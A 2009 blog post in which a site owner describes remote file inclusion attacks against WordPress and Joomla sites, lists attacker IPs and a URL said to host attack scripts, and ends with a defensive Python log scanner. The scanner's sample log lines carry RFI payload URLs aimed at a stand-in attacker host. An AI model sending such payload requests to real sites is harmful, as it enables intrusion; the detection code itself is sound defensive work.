    August 19, 2009


    Hacker Attacks on my site…

    Well, it seems my site is a high target for Indonesian, Korean, Russian, Saudi Arabian and Italian hacker groups (to name just a few). One recent attack (that failed, by the way) led me to Italy, where I found all the scripts they use to attack other web sites (http://labor.labcei.unimore.it/68049/guppy467/users/ proxied behind the 61.250.92.0/24 network). The scripts use a flaw in PHP where they append the URL of their scripts to the URL of a person's PHP page on their site, often targeting WordPress and Joomla. Once done, if the site is vulnerable, it creates a back door for them into the site, and also sends the vulnerable site's OS information (uname -a) back to an IRC channel.

    I managed to figure out where this IRC channel was and sat in for a little while this afternoon. I watched as automated bots sent in links to websites that are vulnerable to their attack. I'm on the fence as to what I should do at this point. On one hand, I'd like to turn them in, but on the other hand, I doubt anything will be done considering these people are from overseas, and are probably masking their true IP address.

    Here is one of the latest attackers on my site today:
    Date: 08/19/09 13:37:58
    IP: 124.244.251.180
    Hostname-Resolved: 124244251180.ctinets.com
    Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)

    If you go here: http://www.ip2location.com/demo.aspx, you will see that they are from Hong Kong (or proxied from there).

    It's difficult to police the web, and I have no intention of doing so. I don't get paid to do so, and really could care less what these people do, so long as they can't get into my site, but another side of me would like to see some justice in the matter.

    So, block your websites from Korean, Russian and Chinese subnets, and be on the lookout for any traffic coming from an IP address of 72.9.225.69. That IP belongs to several websites that sit on the one IP, all from the same hacker crew who go by the name of "racrew" or "radio@ctive crew". If you have a WordPress or Joomla site, be sure you are patched 100%!
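
One way to look for the attack described above (a script URL appended to a PHP page's URL, commonly called remote file inclusion) in your own access logs. This is an added example, not part of the original post: the function name `find_rfi_attempts`, the sample log lines, the addresses and the `attacker.example` host are all constructed, and the Apache/Nginx "combined" log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed input: Apache/Nginx "combined" access-log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that is itself a URL is the signature of this attack.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample log (documentation IP ranges, made-up host and paths).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Aug/2009:13:37:58 -0400] "GET /index.php?page='
    'http://attacker.example/users/id.txt? HTTP/1.1" 200 5120',
    '198.51.100.23 - - [19/Aug/2009:13:38:02 -0400] "GET /blog/load.php?file='
    'http%3A%2F%2Fattacker.example%2Fid.txt%3F&x=1 HTTP/1.0" 404 312',
    '192.0.2.50 - - [19/Aug/2009:13:40:11 -0400] "GET /index.php?page=about '
    'HTTP/1.1" 200 2048',
    '192.0.2.51 - - [19/Aug/2009:13:41:30 -0400] "GET /search.php?q=what+is+'
    'http://example.org HTTP/1.1" 200 900',
]


def find_rfi_attempts(lines):
    """Return one dict per query parameter whose value is a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        parts = urlsplit(m["target"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding.
            decoded = unquote(value).strip()
            if REMOTE_RE.match(decoded):
                hits.append({
                    "ip": m["ip"],
                    "path": parts.path,
                    "param": name,
                    "remote": urlsplit(decoded).hostname,
                    "status": int(m["status"]),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 means the page was served and deserves review first; legitimate parameters that carry URLs (redirect targets, for instance) will also match and need to be allow-listed.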









